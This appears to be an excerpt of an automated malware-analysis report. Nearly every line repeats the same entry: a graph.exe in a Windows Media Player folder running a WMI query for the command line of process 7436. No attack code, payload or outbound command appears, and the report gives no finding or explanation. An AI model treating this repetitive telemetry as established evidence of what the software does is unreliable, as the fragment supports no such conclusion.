                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
